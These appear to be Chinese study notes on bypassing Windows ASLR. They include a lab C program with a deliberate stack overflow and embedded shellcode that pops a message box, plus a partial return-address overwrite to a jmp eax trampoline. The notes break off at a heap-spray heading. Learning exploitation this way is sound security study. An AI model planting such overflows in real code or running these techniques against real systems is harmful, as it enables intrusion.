13.1 内存随机化保护机制的原理

  • ASLR(Address Space Layout Randomization)它包含了映像随机化、堆栈随机化、PEB 与 TEB 随机化。

    13.2 攻击未启用 ASLR 的模块

  • 使用 Flash Player ActiveX 9.0.262不支持ASLR,对其进行攻击。Flash9k.ocx 属于IE的控件。实验的环境支持是:

(1)具有溢出漏洞的 ActiveX 控件。
(2)不启用 ASLR 的 Flash9k.ocx 控件。
(3)可以触发 ActiveX 控件中溢出漏洞的 POC 页面。

13.3 利用部分覆盖进行定位内存地址

  • 原理:由于ASMR对地址的随机只针对前面两个字节,所以通过覆盖地址的最后两个字节以此来找到我们所需要的函数地址。也就类似与”off by one”的原理。
  • 实验代码: ```c

    include “stdafx.h”

    include “stdlib.h”

char shellcode[]= “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” “\x90\x90\x90\x90” “\x90\x90”

“\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C” “\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53” “\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B” “\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95” “\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59” “\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A” “\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75” “\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03” “\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB” “\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50” “\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90” “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” “\x90\x90\x90\x90” “\x2A\x23” ; char test() { char tt[256]; memcpy(tt,shellcode,262); return tt;
} int _tmain(int argc, _TCHAR
argv[]) { char temp[200]; test(); return 0; } ```

  • 实验代码的思路是:

(1)为了更直观地反映绕过 ASLR 的过程,本次实验编译的程序不启用 GS。
(2)编译程序时禁用 DEP。
(3)test 函数中存在一个典型的溢出漏洞,通过复制超长字符串可以覆盖函数返回地址。
(4)复制结束后,test 函数返回 tt 字符数组的首地址。
(5)我们在相对程序加载基址 0x0000~0xFFFF 的范围内,找到一条跳板指令,并用它地址的后 2 个字节覆盖返回地址的后两个字节。
(6)采用这种类似“相对寻址”的方法来动态确定跳板指令的地址,以实现跳板指令的通用性。

  • 实验关键点:由于test()函数在retn返回时,eax寄存器刚好存放的是shellcode的起始地址,所以我们可以通过一条jmp eax指令来将程序跳转到我们的shellcode,儿jmp eax指令的地址的后两个自己是0x232A,所以在shellcode中使用0x232A来覆盖返回地址的后两个字节,就能跳到eax所指向的shellcode的位置。

    13.4 利用 Heap spray 技术定位内存地